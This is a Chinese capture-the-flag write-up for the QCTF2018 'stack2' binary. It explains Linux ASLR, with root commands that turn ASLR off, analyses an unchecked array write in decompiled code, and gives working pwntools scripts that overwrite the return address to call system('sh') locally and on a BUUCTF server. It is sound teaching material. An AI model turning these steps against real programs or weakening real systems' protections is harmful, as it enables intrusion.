【QCTF2018】stack2------<ASLR保护机制>


前言

在最简单的栈溢出中,如果程序中存在获取shell的后门函数,则只需要简单的通过溢出手段将函数的返回地址修改为后门函数的地址,便可以轻松获取shell。而对于没有提供后门函数的程序,可以通过往栈里面写入shellcode,在返回的时候将控制流劫持到栈里面的shellcode获取shell。但是对于加入NX保护的程序,在栈中写入shellcode的方法则不再适用,而ROP就是其中一种绕过保护的手段。ROP的全称为Return-oriented programming(返回导向编程),其核心思想是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程


知识点详解

0x1 ASLR保护机制

ASLR,全称为 Address Space Layout Randomization,地址空间布局随机化。ASLR 技术在 2005 年的 kernel 2.6.12 中被引入到 Linux 系统,它将进程的某些内存空间地址进行随机化来增大入侵者预测目的地址的难度,从而降低进程被成功入侵的风险。当前 Linux、Windows 等主流操作系统都已经采用该项技术。

在Linux平台上,ASLR分为了0,1,2三级,通过一个内核参数randomize_va_space进行控制。对应的含义如下:

  • /proc/sys/kernel/randomize_va_space = 0:没有随机化。即关闭 ASLR。
  • /proc/sys/kernel/randomize_va_space = 1:保留的随机化。共享库、栈、mmap() 以及 VDSO 将被随机化。
  • /proc/sys/kernel/randomize_va_space = 2:完全的随机化。在randomize_va_space = 1的基础上,通过 brk() 分配的内存空间也将被随机化(一般在pwn的环境中,ASLR是开满的)。

通过以下命令可以查看系统当前的ASLR等级:
$ cat /proc/sys/kernel/randomize_va_space
root权限的shell中,可以通过以下指令修改ASLR:
echo 0 > /proc/sys/kernel/randomize_va_space
echo 1 > /proc/sys/kernel/randomize_va_space
echo 2 > /proc/sys/kernel/randomize_va_space


下面通过一段程序来测试ASLR

// aslr.c
// environment:Ubuntu 18.04
// gcc version: 7.5.0

#include <stdio.h>

int func(int);
int globalVar = 10;
int uninitGlobalVar;
			
int main()
{
    
    
	int localVar = 10;

	printf("The address of func() is %p, in .text section\n", func);
    printf("The address of globalVar is %p, in .data section\n", &globalVar);
    printf("The address of uninitGlobalVar is %p, in .bss section\n", &uninitGlobalVar);
    printf("The address of localVar is %p, in stack\n", &localVar);
	
	return 0;
}
int func(int a)	
{
    
    
	return a+1;
}

分别利用命令gcc -no-pie aslr.c -o aslr64gcc -m32 -no-pie aslr.c -o aslr32生成64位和32位的可执行程序,在ASLR保护等级为2的系统下运行四次:

通过运行程序可以发现无论是64位的程序还是32位的程序,每一次执行,程序装载到内存后,其代码段和数据段的地址始终是相同的,可见ASLR并不会随机化代码段和数据段。但是对于存放在函数调用栈中的局部变量localVar,每一次执行其地址都不同,可见ASLR随机化了栈的地址更细心可以发现,即使四次执行栈的地址被随机化了,但是其低4位始终是同一个值8,可见栈的随机化是对低4位对齐的。同样可以通过ldd命令查看程序加载动态库的地址,会发现其同样被随机化了,但是对低12位对齐(所谓页面的4K对齐??)。
事实上,Linux 平台通过 PIE 机制来负责代码段和数据段的随机化工作,而不是 ASLR。要开启 PIE,在使用 gcc 进行编译链接时添加 -fpie -pie 选项即可(gcc是默认打开PIE保护的)。但是只有在开启 ASLR 之后,PIE 才会生效。


writeup

先用file查看文件的属性,可以看出stack2是32位的ELF可执行文件

再用checksec查看文件的保护机制,打开canary保护NX栈不可执行保护:

初步运行一下程序:

大概意思就是给你创建了一个数据结构存放你希望存放的一些数字。并提供对这些数字的一些操作,包括打印,添加,改变,算平均值。同时根据IDA进行静态分析:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    
    
  int v3; // eax
  unsigned int v5; // [esp+18h] [ebp-90h]
  unsigned int v6; // [esp+1Ch] [ebp-8Ch]
  int v7; // [esp+20h] [ebp-88h]
  unsigned int j; // [esp+24h] [ebp-84h]
  int v9; // [esp+28h] [ebp-80h]
  unsigned int i; // [esp+2Ch] [ebp-7Ch]
  unsigned int k; // [esp+30h] [ebp-78h]
  unsigned int l; // [esp+34h] [ebp-74h]
  char v13[100]; // [esp+38h] [ebp-70h]
  unsigned int v14; // [esp+9Ch] [ebp-Ch]

  v14 = __readgsdword(0x14u);
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  v9 = 0;
  puts("***********************************************************");
  puts("*                      An easy calc                       *");
  puts("*Give me your numbers and I will return to you an average *");
  puts("*(0 <= x < 256)                                           *");
  puts("***********************************************************");
  puts("How many numbers you have:");
  __isoc99_scanf("%d", &v5);
  puts("Give me your numbers");
  for ( i = 0; i < v5 && (signed int)i <= 99; ++i )
  {
    
    
    __isoc99_scanf("%d", &v7);
    v13[i] = v7;
  }
  for ( j = v5; ; printf("average is %.2lf\n", (double)((long double)v9 / (double)j)) )
  {
    
    
    while ( 1 )
    {
    
    
      while ( 1 )
      {
    
    
        while ( 1 )
        {
    
    
          puts("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit");
          __isoc99_scanf("%d", &v6);
          if ( v6 != 2 )
            break;
          puts("Give me your number");
          __isoc99_scanf("%d", &v7);
          if ( j <= 0x63 )
          {
    
    
            v3 = j++;
            v13[v3] = v7;
          }
        }
        if ( v6 > 2 )
          break;
        if ( v6 != 1 )
          return 0;
        puts("id\t\tnumber");
        for ( k = 0; k < j; ++k )
          printf("%d\t\t%d\n", k, v13[k]);
      }
      if ( v6 != 3 )
        break;
      puts("which number to change:");
      __isoc99_scanf("%d", &v5);
      puts("new number:");
      __isoc99_scanf("%d", &v7);
      v13[v5] = v7;
    }
    if ( v6 != 4 )
      break;
    v9 = 0;
    for ( l = 0; l < j; ++l )
      v9 += v13[l];
  }
  return 0;
}

可以很明显的发现在第66行中的v13[v5] = v7这句代码存在溢出漏洞,因为在给数组写值的时候,没有检查数组边界。
同时在IDA的函数窗口中发现有后门函数hackhere

这样思路就很清晰了,我们只需要通过数组溢出来实现对返回地址的改写,即可获得shell。首先跳转到v13[i]=v7处的汇编代码,进行分析,如下:
在这里插入图片描述
从这里可以得出关键的信息,v13距离ebp的偏移是0x70。按照往常的思维,v13到返回地址的偏移应就是0x70+0x04了,但是,当我将该处写入后门函数的地址时候,并没有理所应当的拿到shell。经过再次分析,看到main函数的函数开始处:

果然有猫腻,main函数开辟栈帧并没有用常见的PUSH EBP; MOV EBP ESP;  SUB ESP OFFSET的方式来开辟栈帧,这样的话返回地址就并没有存放在ebp的上面。由于有ASLR的栈基址随机化保护,那么每次栈的基址不同,那and esp, 0FFFFFFF0h是不是会导致每次程序执行有不同的偏移呢?并不是,因为在上面的ASLR保护机制处我们已经分析发现了,虽然ASLR会使得栈的基址随机化,但是其低四位仍然是固定的,那么尽管main函数采用上述的开辟栈帧的方式,程序每次加载,main函数栈帧的ebp指针到返回地址的偏移仍然是固定的,且等于esp的低四位表示的字节数+4字节+4字节。这样就可以在gdb中动态调试,查看esp的低四位,在main函数的入口处打断点,此时esp指向的是返回地址,且其低四位为0xC
在这里插入图片描述
这样可以得到mian函数栈帧的ebp到返回地址的偏移为:0xC+0x4+0x4 =0x14。因此得出v13到返回地址的偏移为:0x14+0x70 = 0x84。如下图所示:


在这里插入图片描述
OK,基本思路已经可以了,写exp脚本:


在这里插入图片描述

from pwn import *
context(log_level='debug')
r = process("./stack2")

binsh = 0x08048980
addr_offset = 0x84
call_system_addr = 0x080485B4

r.recvuntil("How many numbers you have:\n")
r.sendline("1")
r.recvuntil("Give me your numbers\n")
r.sendline("1")

def write_v13(offset, num):
	r.recvuntil("5. exit\n")
	r.sendline("3")
	r.recvuntil("which number to change:\n")
	r.sendline(str(offset))
	r.recvuntil("new number:\n")
	r.sendline(str(num))

# change the return address to the address of the system func
write_v13(addr_offset, 0xb4)
write_v13(addr_offset+1, 0x85)
write_v13(addr_offset+2, 0x04)
write_v13(addr_offset+3, 0x08)

# write system func par
write_v13(addr_offset+4, 0x80)
write_v13(addr_offset+5, 0x89)
write_v13(addr_offset+6, 0x04)
write_v13(addr_offset+7, 0x08)

r.sendline("5")
r.interactive()

会发现这段脚本可以在本地打通,但是打远程却不行,查了一下是因为出题人忘记把/bin/bash配置到环境中,但是因为仍然能做就没有改,这样我们可以试一下能否用system(“sh”)来获取shell,因为在/bin/bash中就有sh这个字段,且偏移为7,那么我们仅仅需要上述write_v13(addr_offset+4, 0x80)write_v13(addr_offset+4, 0x87)即可,果然这样便获得了shell。


exp

from pwn import *
context(log_level='debug')
r = remote("node3.buuoj.cn", 26883)
#r = process("./stack2")

binsh = 0x08048980
addr_offset = 0x84
call_system_addr = 0x080485B4

r.recvuntil("How many numbers you have:\n")
r.sendline("1")
r.recvuntil("Give me your numbers\n")
r.sendline("1")

def write_v13(offset, num):
	r.recvuntil("5. exit\n")
	r.sendline("3")
	r.recvuntil("which number to change:\n")
	r.sendline(str(offset))
	r.recvuntil("new number:\n")
	r.sendline(str(num))

# change the return address to the address of the system func
write_v13(addr_offset, 0xb4)
write_v13(addr_offset+1, 0x85)
write_v13(addr_offset+2, 0x04)
write_v13(addr_offset+3, 0x08)

# write system func par
write_v13(addr_offset+4, 0x87)
write_v13(addr_offset+5, 0x89)
write_v13(addr_offset+6, 0x04)
write_v13(addr_offset+7, 0x08)

r.sendline("5")
r.interactive()

成功获得shell和flag:
在这里插入图片描述

注:可通过BUUCTF平台获取题目和环境

猜你喜欢

转载自blog.csdn.net/qq_21746331/article/details/111793371